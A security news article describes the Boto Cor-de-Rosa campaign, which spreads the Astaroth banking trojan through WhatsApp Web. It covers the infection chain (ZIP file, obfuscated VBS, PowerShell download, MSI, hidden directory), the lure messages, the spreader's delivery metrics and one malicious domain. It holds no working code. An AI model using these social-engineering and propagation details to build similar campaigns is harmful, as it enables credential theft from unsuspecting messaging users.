A new sophisticated malware campaign, dubbed Boto Cor-de-Rosa, is leveraging WhatsApp Web to automatically spread the Astaroth banking trojan to Windows users, primarily impacting those in Brazil. This evolving threat demonstrates a concerning tactic of exploiting popular messaging platforms to create a self-sustaining infection loop, harvesting contact lists and aggressively propagating malicious payloads.
The campaign’s primary objective is twofold: to propagate itself rapidly and to steal sensitive user credentials. Researchers have identified that the malware utilizes persuasive social engineering tactics to trick victims into executing malicious files. This automated propagation via WhatsApp Web represents a significant shift in how malware campaigns operate, making it harder to contain outbreaks.
Understanding the Boto Cor-de-Rosa Attack Mechanism
The infection chain begins when a user receives a ZIP file through WhatsApp Web. These files are often named in a way that mimics legitimate file transfers, such as “552516107-a9af16a8-552.zip,” to reduce suspicion. Upon extraction, victims are presented with a Visual Basic script (VBS) disguised as an ordinary file. This script is the initial gateway for the malware.
Once executed, the VBS script is designed to remain undetected and initiates the download of two critical components. The first is the core Astaroth banking malware, written in Delphi, which is responsible for its malicious functions. Crucially, the second component is a Python-based module specifically engineered to act as a WhatsApp spreader, enabling the automated propagation.
The social engineering employed by the Astaroth campaign is remarkably refined. According to Acronis researchers, the Python spreader module intelligently assesses the time of day to craft personalized greetings in Portuguese. The messages are crafted to appear friendly and helpful, often reading something like, “Segue o arquivo solicitado. Qualquer dvida estou disposio!” This translates to, “Here is the requested file. If you have any questions, I’m available!” By using familiar and reassuring language, the attackers significantly increase the likelihood of recipients trusting the attached file and proceeding with its execution.
Technical Details of Malware Propagation and Payload Delivery
The propagation module within the Astaroth malware is equipped with advanced tracking mechanisms that provide real-time insights into its spreading activities. It diligently monitors delivery metrics, calculating statistics such as the number of successful message deliveries, failed attempts, and the overall sending rate, measured in messages per minute. This data allows the attackers to optimize their propagation strategy and ensure maximum reach.
Furthermore, the module generates periodic progress updates, typically after every 50 messages sent. These updates highlight the percentage of contacts that have been processed and the current throughput of the spreading operation, offering a granular view of the campaign’s momentum.
The initial VBS downloader, embedded within the ZIP archive, is typically between 50 and 100 KB in size. It is heavily obfuscated to evade detection by antivirus software and security solutions. Once deobfuscated, the script executes PowerShell commands to download subsequent components from compromised domains. Researchers have identified domains such as coffe-estilo.com as part of this infrastructure.
The downloaded files are often packaged as an MSI installer. This package deploys the necessary files to a hidden directory, commonly “C:MicrosoftEdgeCache6.60.2.9313.” This directory contains the executable file, electron.exe, along with various DLL files that collectively constitute the complete Astaroth banking payload. The malware then lies dormant, awaiting further instructions or initiating its credential-stealing operations.
The Boto Cor-de-Rosa campaign serves as a stark reminder of the evolving tactics employed by cybercriminals. By integrating malware propagation directly into popular consumer applications like WhatsApp Web, attackers are creating more pervasive and difficult-to-trace infection vectors. Users are strongly advised to exercise extreme caution when receiving any unexpected files via messaging platforms, regardless of how familiar the sender may seem, and to ensure their systems are protected with up-to-date security software.